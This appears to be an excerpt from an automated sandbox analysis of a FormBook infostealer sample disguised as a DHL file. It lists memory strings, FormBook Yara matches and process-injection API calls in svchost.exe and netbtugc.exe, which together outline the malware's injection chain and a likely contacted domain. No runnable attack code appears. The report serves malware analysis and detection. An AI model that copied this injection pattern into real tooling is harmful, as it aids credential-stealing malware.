            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.4463074784.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000003CC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.4463074784.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000003CC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.4461436648.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.2334396891.00000000074B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.4463074784.000000000490A000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000430A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?FPJps=mxnR
            Source: netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.4464718266.00000000059F0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000399E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000399E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000AEAFF
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_000AED6A
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000AEAFF
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0009AA57
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_000C9576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: rDHL8350232025-2.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: rDHL8350232025-2.exe, 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_66c67aac-5
            Source: rDHL8350232025-2.exe, 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ec335951-a
            Source: rDHL8350232025-2.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e7b97c85-6
            Source: rDHL8350232025-2.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_6bb34b09-8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FA0 NtQuerySection,2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F90 NtProtectVirtualMemory,2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EA0 NtAdjustPrivilegesToken,2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E80 NtReadVirtualMemory,2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D00 NtSetInformationFile,2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DB0 NtEnumerateKey,2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C60 NtCreateKey,2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C00 NtQueryInformationProcess,2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CC0 NtQueryVirtualMemory,2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CA0 NtQueryInformationToken,2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673010 NtOpenDirectoryObject,2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673090 NtSetValueKey,2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D70 NtOpenThread,2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03673D10 NtOpenProcessToken,2_2_03673D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E24340 NtSetContextThread,LdrInitializeThunk,4_2_02E24340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E24650 NtSuspendThread,LdrInitializeThunk,4_2_02E24650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22AF0 NtWriteFile,LdrInitializeThunk,4_2_02E22AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22AD0 NtReadFile,LdrInitializeThunk,4_2_02E22AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22BE0 NtQueryValueKey,LdrInitializeThunk,4_2_02E22BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02E22BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_02E22BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22B60 NtClose,LdrInitializeThunk,4_2_02E22B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02E22EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_02E22E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22FE0 NtCreateFile,LdrInitializeThunk,4_2_02E22FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22FB0 NtResumeThread,LdrInitializeThunk,4_2_02E22FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22F30 NtCreateSection,LdrInitializeThunk,4_2_02E22F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02E22CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22C60 NtCreateKey,LdrInitializeThunk,4_2_02E22C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02E22C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02E22DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22DD0 NtDelayExecution,LdrInitializeThunk,4_2_02E22DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02E22D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02E22D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E235C0 NtCreateMutant,LdrInitializeThunk,4_2_02E235C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E239B0 NtGetContextThread,LdrInitializeThunk,4_2_02E239B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22AB0 NtWaitForSingleObject,4_2_02E22AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22B80 NtQueryInformationFile,4_2_02E22B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22EA0 NtAdjustPrivilegesToken,4_2_02E22EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22E30 NtWriteVirtualMemory,4_2_02E22E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22FA0 NtQuerySection,4_2_02E22FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22F90 NtProtectVirtualMemory,4_2_02E22F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22F60 NtCreateProcessEx,4_2_02E22F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22CF0 NtOpenProcess,4_2_02E22CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22CC0 NtQueryVirtualMemory,4_2_02E22CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22C00 NtQueryInformationProcess,4_2_02E22C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22DB0 NtEnumerateKey,4_2_02E22DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E22D00 NtSetInformationFile,4_2_02E22D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E23090 NtSetValueKey,4_2_02E23090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E23010 NtOpenDirectoryObject,4_2_02E23010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E23D70 NtOpenThread,4_2_02E23D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02E23D10 NtOpenProcessToken,4_2_02E23D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00477920 NtCreateFile,4_2_00477920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00477A70 NtReadFile,4_2_00477A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00477B50 NtDeleteFile,4_2_00477B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00477BE0 NtClose,4_2_00477BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00477D30 NtAllocateVirtualMemory,4_2_00477D30
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0009D5EB
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00091201
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0009E8F6
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A20460_2_000A2046
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000380600_2_00038060
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000982980_2_00098298
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0006E4FF0_2_0006E4FF
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0006676B0_2_0006676B
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000C48730_2_000C4873
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0005CAA00_2_0005CAA0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0003CAF00_2_0003CAF0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0004CC390_2_0004CC39
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00066DD90_2_00066DD9
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0004B1190_2_0004B119
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000391C00_2_000391C0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000513940_2_00051394
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000517060_2_00051706
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0005781B0_2_0005781B
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000379200_2_00037920
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0004997D0_2_0004997D
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000519B00_2_000519B0
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00057A4A0_2_00057A4A
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00051C770_2_00051C77
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00057CA70_2_00057CA7
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000BBE440_2_000BBE44
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00069EEE0_2_00069EEE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00051F320_2_00051F32
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0117BF500_2_0117BF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168712_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028A02_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101732_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1F32_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012902_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035002_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040268A2_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026982_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026A02_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF4A2_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D7532_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF532_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
